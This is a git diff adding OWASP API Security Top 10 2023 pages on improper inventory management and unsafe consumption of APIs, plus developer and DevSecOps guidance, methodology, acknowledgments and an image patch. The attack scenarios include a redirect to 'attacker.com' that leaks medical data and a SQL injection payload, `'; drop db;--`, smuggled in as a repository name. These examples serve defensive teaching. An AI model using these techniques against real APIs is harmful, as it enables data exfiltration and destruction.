+| Threat agents usually get unauthorized access through old API versions or endpoints left running unpatched and using weaker security requirements. In some cases exploits are available. Alternatively, they may get access to sensitive data through a 3rd party with whom there's no reason to share data with. | Outdated documentation makes it more difficult to find and/or fix vulnerabilities. Lack of assets inventory and retirement strategies leads to running unpatched systems, resulting in leakage of sensitive data. It's common to find unnecessarily exposed API hosts because of modern concepts like microservices, which make applications easy to deploy and independent (e.g. cloud computing, K8S). Simple Google Dorking, DNS enumeration, or using specialized search engines for various types of servers (webcams, routers, servers, etc.) connected to the internet will be enough to discover targets. | Attackers can gain access to sensitive data, or even take over the server. Sometimes different API versions/deployments are connected to the same database with real data. Threat agents may exploit deprecated endpoints available in old API versions to get access to administrative functions or exploit known vulnerabilities. |
+
+## Is the API Vulnerable?
+
+The sprawled and connected nature of APIs and modern applications brings new
+challenges. It is important for organizations not only to have a good
+understanding and visibility of their own APIs and API endpoints, but also how
+the APIs are storing or sharing data with external third parties.
+
+Running multiple versions of an API requires additional management resources
+from the API provider and expands the attack surface.
+
+An API has a "documentation blindspot" if:
+
+* The purpose of an API host is unclear, and there are no explicit answers to
+ the following questions
+ * Which environment is the API running in (e.g. production, staging, test,
+ development)?
+ * Who should have network access to the API (e.g. public, internal, partners)?
+ * Which API version is running?
+* There is no documentation or the existing documentation is not updated.
+* There is no retirement plan for each API version.
+* The host's inventory is missing or outdated.
+
+The visibility and inventory of sensitive data flows play an important role as
+part of an incident response plan, in case a breach happens on the third party
+side.
+
+An API has a "data flow blindspot" if:
+
+* There is a "sensitive data flow" where the API shares sensitive data with a
+ third party and
+ * There is not a business justification or approval of the flow
+ * There is no inventory or visibility of the flow
+ * There is not deep visibility of which type of sensitive data is shared
+
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+A social network implemented a rate-limiting mechanism that blocks attackers
+from using brute force to guess reset password tokens. This mechanism wasn't
+implemented as part of the API code itself but in a separate component between
+the client and the official API (`api.socialnetwork.owasp.org`). A researcher
+found a beta API host (`beta.api.socialnetwork.owasp.org`) that runs the same
+API, including the reset password mechanism, but the rate-limiting mechanism was
+not in place. The researcher was able to reset the password of any user by using
+simple brute force to guess the 6 digit token.
+
+### Scenario #2
+
+A social network allows developers of independent apps to integrate with it. As
+part of this process a consent is requested from the end user, so the social
+network can share the user's personal information with the independent app.
+
+The data flow between the social network and the independent apps is not
+restrictive or monitored enough, allowing independent apps to access not only
+the user information but also the private information of all of their friends.
+
+A consulting firm builds a malicious app and manages to get the consent of
+270,000 users. Because of the flaw, the consulting firm manages to get access
+to the private information of 50,000,000 users. Later, the consulting firm
+sells the information for malicious purposes.
+
+## How To Prevent
+
+* Inventory all API hosts and document important aspects of each one
+ of them, focusing on the API environment (e.g. production, staging, test,
+ development), who should have network access to the host (e.g. public,
+ internal, partners) and the API version.
+* Inventory integrated services and document important aspects such
+ as their role in the system, what data is exchanged (data flow), and their
+ sensitivity.
+* Document all aspects of your API such as authentication, errors, redirects,
+ rate limiting, cross-origin resource sharing (CORS) policy, and endpoints,
+ including their parameters, requests, and responses.
+* Generate documentation automatically by adopting open standards. Include the
+ documentation build in your CI/CD pipeline.
+* Make API documentation available only to those authorized to use the API.
+* Use external protection measures such as API security specific solutions for
+ all exposed versions of your APIs, not just for the current production
+ version.
+* Avoid using production data with non-production API deployments. If this is
+ unavoidable, these endpoints should get the same security treatment as the
+ production ones.
+* When newer versions of APIs include security improvements, perform a risk
+ analysis to inform the mitigation actions required for the older versions.
+ For example, whether it is possible to backport the improvements without
+ breaking API compatibility or if you need to take the older version out
+ quickly and force all clients to move to the latest version.
+
+
+## References
+
+### External
+
+* [CWE-1059: Incomplete Documentation][1]
+
+[1]: https://cwe.mitre.org/data/definitions/1059.html
diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
new file mode 100644
index 000000000..016b1ddba
--- /dev/null
+++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
@@ -0,0 +1,108 @@
+# API10:2023 Unsafe Consumption of APIs
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Average** | Technical **Severe** : Business Specific |
+| Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. |
+
+## Is the API Vulnerable?
+
+Developers tend to trust data received from third-party APIs more than user
+input. This is especially true for APIs offered by well-known companies.
+Because of that, developers tend to adopt weaker security standards, for
+instance, in regards to input validation and sanitization.
+
+The API might be vulnerable if:
+
+* Interacts with other APIs over an unencrypted channel;
+* Does not properly validate and sanitize data gathered from other APIs prior
+ to processing it or passing it to downstream components;
+* Blindly follows redirections;
+* Does not limit the number of resources available to process third-party
+ services responses;
+* Does not implement timeouts for interactions with third-party services;
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+An API relies on a third-party service to enrich user provided business
+addresses. When an address is supplied to the API by the end user, it is sent
+to the third-party service and the returned data is then stored on a local
+SQL-enabled database.
+
+Bad actors use the third-party service to store an SQLi payload associated with
+a business created by them. Then they go after the vulnerable API providing
+specific input that makes it pull their "malicious business" from the
+third-party service. The SQLi payload ends up being executed by the database,
+exfiltrating data to an attacker's controlled server.
+
+### Scenario #2
+
+An API integrates with a third-party service provider to safely store sensitive
+user medical information. Data is sent over a secure connection using an HTTP
+request like the one below:
+
+```
+POST /user/store_phr_record
+{
+ "genome": "ACTAGTAG__TTGADDAAIICCTT…"
+}
+```
+
+Bad actors found a way to compromise the third-party API and it starts
+responding with a `308 Permanent Redirect` to requests like the previous one.
+
+```
+HTTP/1.1 308 Permanent Redirect
+Location: https://attacker.com/
+```
+
+Since the API blindly follows the third-party redirects, it will repeat the
+exact same request including the user's sensitive data, but this time to the
+attacker's server.
+
+### Scenario #3
+
+An attacker can prepare a git repository named `'; drop db;--`.
+
+Now, when an integration from an attacked application is done with the
+malicious repository, SQL injection payload is used on an application that
+builds an SQL query believing the repository's name is safe input.
+
+## How To Prevent
+
+* When evaluating service providers, assess their API security posture.
+* Ensure all API interactions happen over a secure communication channel (TLS).
+* Always validate and properly sanitize data received from integrated APIs
+ before using it.
+* Maintain an allowlist of well-known locations integrated APIs may redirect
+ yours to: do not blindly follow redirects.
+
+
+## References
+
+### OWASP
+
+* [Web Service Security Cheat Sheet][1]
+* [Injection Flaws][2]
+* [Input Validation Cheat Sheet][3]
+* [Injection Prevention Cheat Sheet][4]
+* [Transport Layer Protection Cheat Sheet][5]
+* [Unvalidated Redirects and Forwards Cheat Sheet][6]
+
+### External
+
+* [CWE-20: Improper Input Validation][7]
+* [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor][8]
+* [CWE-319: Cleartext Transmission of Sensitive Information][9]
+
+[1]: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html
+[2]: https://www.owasp.org/index.php/Injection_Flaws
+[3]: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
+[4]: https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html
+[5]: https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html
+[6]: https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
+[7]: https://cwe.mitre.org/data/definitions/20.html
+[8]: https://cwe.mitre.org/data/definitions/200.html
+[9]: https://cwe.mitre.org/data/definitions/319.html
diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md
new file mode 100644
index 000000000..89139c49f
--- /dev/null
+++ b/editions/2023/pt-pt/0xb0-next-devs.md
@@ -0,0 +1,38 @@
+# What's Next For Developers
+
+The task to create and maintain secure applications, or fixing existing
+applications, can be difficult. It is no different for APIs.
+
+We believe that education and awareness are key factors to writing secure
+software. Everything else required to accomplish the goal depends on
+**establishing and using repeatable security processes and standard security
+controls**.
+
+OWASP provides numerous free and open resources to help you address security.
+Please visit the [OWASP Projects page][1] for a comprehensive list of available
+projects.
+
+| | |
+|-|-|
+| **Education** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. |
+| **Security Requirements** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. |
+| **Security Architecture** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. |
+| **Standard Security Controls** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. |
+| **Secure Software Development Life Cycle** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. |
+
+[1]: https://owasp.org/projects/
+[2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder
+[3]: https://owasp.org/www-project-crapi/
+[4]: https://owasp.org/www-project-juice-shop/
+[5]: https://owasp.org/www-project-vulnerable-web-applications-directory/
+[6]: https://owasp.org/events/
+[7]: https://owasp.org/chapters/
+[8]: https://owasp.org/www-project-application-security-verification-standard/
+[9]: https://owasp.org/www-community/OWASP_Secure_Software_Contract_Annex
+[10]: https://cheatsheetseries.owasp.org/
+[11]: https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html
+[12]: https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html
+[13]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html
+[14]: https://owasp.org/www-project-proactive-controls/
+[15]: https://owasp.org/www-project-samm/
+[16]: https://owasp.org/www-project-code-review-guide/
diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md
new file mode 100644
index 000000000..7cf75e87d
--- /dev/null
+++ b/editions/2023/pt-pt/0xb1-next-devsecops.md
@@ -0,0 +1,29 @@
+# What's Next For DevSecOps
+
+Due to their importance in modern application architectures, building secure
+APIs is crucial. Security cannot be neglected, and it should be part of the
+whole development life cycle. Scanning and penetration testing yearly are no
+longer enough.
+
+DevSecOps should join the development effort, facilitating continuous security
+testing across the entire software development life cycle. Your goal should be
+to enhance the development pipeline with security automation, but without
+impacting the speed of development.
+
+In case of doubt, stay informed, and refer to the [DevSecOps Manifesto][1].
+
+| | |
+|-|-|
+| **Understand the Threat Model** | Testing priorities come from a threat model. If you don't have one, consider using [OWASP Application Security Verification Standard (ASVS)][2], and the [OWASP Testing Guide][3] as an input. Involving the development team will help to make them more security-aware. |
+| **Understand the SDLC** | Join the development team to better understand the Software Development Life Cycle. Your contribution on continuous security testing should be compatible with people, processes, and tools. Everyone should agree with the process, so that there's no unnecessary friction or resistance. |
+| **Testing Strategies** | Since your work should not impact the development speed, you should wisely choose the best (simple, fastest, most accurate) technique to verify the security requirements. The [OWASP Security Knowledge Framework][4] and [OWASP Application Security Verification Standard][2] can be great sources of functional and nonfunctional security requirements. There are other great sources for [projects][5] and [tools][6] similar to the one offered by the [DevSecOps community][7]. |
+| **Achieving Coverage and Accuracy** | You're the bridge between developers and operations teams. To achieve coverage, not only should you focus on the functionality, but also the orchestration. Work close to both development and operations teams from the beginning so you can optimize your time and effort. You should aim for a state where the essential security is verified continuously. |
+| **Clearly Communicate Findings** | Contribute value with less or no friction. Deliver findings in a timely fashion, within the tools development teams are using (not PDF files). Join the development team to address the findings. Take the opportunity to educate them, clearly describing the weakness and how it can be abused, including an attack scenario to make it real. |
+
+[1]: https://www.devsecops.org/
+[2]: https://owasp.org/www-project-application-security-verification-standard/
+[3]: https://owasp.org/www-project-web-security-testing-guide/
+[4]: https://owasp.org/www-project-security-knowledge-framework/
+[5]: http://devsecops.github.io/
+[6]: https://github.com/devsecops/awesome-devsecops
+[7]: http://devsecops.org
diff --git a/editions/2023/pt-pt/0xd0-about-data.md b/editions/2023/pt-pt/0xd0-about-data.md
new file mode 100644
index 000000000..3e856f718
--- /dev/null
+++ b/editions/2023/pt-pt/0xd0-about-data.md
@@ -0,0 +1,73 @@
+# Methodology and Data
+
+## Overview
+
+For this list update, the OWASP API Security team used the same methodology used
+for the successful and well adopted 2019 list, with the addition of a 3 month
+[public Call for Data][1]. Unfortunately, this call for data did not result in
+data that would have enabled a relevant statistical analysis of the most common
+API security issues.
+
+However, with a more mature API security industry capable of providing direct
+feedback and insights, the update process moved forward using the same
+methodology as before.
+
+Arrived here, we believe to have a good forward-looking awareness document for
+the next three or four years, more focused on modern APIs-specific issues. The
+goal of this project isn't to replace other top 10 lists, but instead to cover
+the existing and upcoming top API security risks that we believe the industry
+should be aware and diligent about.
+
+## Methodology
+
+In the first phase, publicly available data about API security incidents were
+collected, reviewed, and categorized. Such data were collected from bug bounty
+platforms and publicly available reports. Only issues reported between 2019 and
+2022 were considered. This data was used to give the team a sense of in which
+direction the previous top 10 list should evolve as well as to help deal with
+possible contributed data bias.
+
+A public [Call for Data][1] ran from September 1st and November 30th, 2022. In
+parallel the project team started the discussion about what has changed since
+2019. The discussion included the impact of the first list, feedback received
+from the community, and new trends of API security.
+
+The project team promoted meetings with specialists on relevant API security
+threats to get insights into how victims are impacted and how those threats can
+be mitigated.
+
+This effort resulted in an initial draft of what the team believes were the ten
+most critical API security risks. The [OWASP Risk Rating Methodology][2] was
+used to perform the risk analysis. Prevalence ratings were decided from a
+consensus among the project team members, based on their experience in the
+field. For considerations on these matters, please refer to the [API Security
+Risks][3] section.
+
+The initial draft was then shared for review with security practitioners with
+relevant experience in the API security fields. Their comments were reviewed,
+discussed, and when applicable included in the document. The resulting document
+was [published as a Release Candidate][4] for [open discussion][5]. Several
+[community contributions][6] were included into the final document.
+
+The list of contributors is available in the [Acknowledgments][7] section.
+
+## API Specific Risks
+
+The list is built to address security risks that are more specific to APIs.
+
+It does not imply that other generic application security risks don't exist in
+API based applications. For example, we didn't include risks such as "Vulnerable
+and Outdated Components" or "Injection", even though you might find them in API
+based applications. These risks are generic, they don't behave differently in
+APIs, nor their exploitation is different.
+
+Our goal is to increase the awareness of security risks that deserve special
+attention in APIs.
+
+[1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/
+[2]: https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology
+[3]: ./0x10-api-security-risks.md
+[4]: https://owasp.org/www-project-api-security/announcements/2023/02/api-top10-2023rc
+[5]: https://github.com/OWASP/API-Security/issues?q=is%3Aissue+label%3A2023RC
+[6]: https://github.com/OWASP/API-Security/pulls?q=is%3Apr+label%3A2023RC
+[7]: ./0xd1-acknowledgments.md
diff --git a/editions/2023/pt-pt/0xd1-acknowledgments.md b/editions/2023/pt-pt/0xd1-acknowledgments.md
new file mode 100644
index 000000000..19bfb30a3
--- /dev/null
+++ b/editions/2023/pt-pt/0xd1-acknowledgments.md
@@ -0,0 +1,13 @@
+# Acknowledgments
+
+## Acknowledgments to Contributors
+
+We'd like to thank the following contributors who contributed publicly on
+GitHub, or via other means:
+
+247arjun, abunuwas, Alissa Knight, Arik Atar, aymenfurter, Corey J. Ball, cyn8,
+d0znpp, Dan Gordon, donge, Dor Tumarkin, faizzaidi, gavjl, guybensimhon, Inês
+Martins, Isabelle Mauny, Ivan Novikov, jmanico, Juan Pablo, k7jto, LaurentCB,
+llegaz, Maxim Zavodchik, MrPRogers, planetlevel, rahulk22, Roey Eliyahu, Roshan
+Piyush, securitylevelup, sudeshgadewar123, Tatsuya-hasegawa, tebbers, vanderaj,
+wenz, xplo1t-sec, Yaniv Balmas, ynvb
diff --git a/editions/2023/pt-pt/images/cover.jpg b/editions/2023/pt-pt/images/cover.jpg new file mode 100644 index 0000000000000000000000000000000000000000..db6e87f8d8a5f924006fdc7c521a13c2dee316f0 GIT binary patch literal 123390 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 
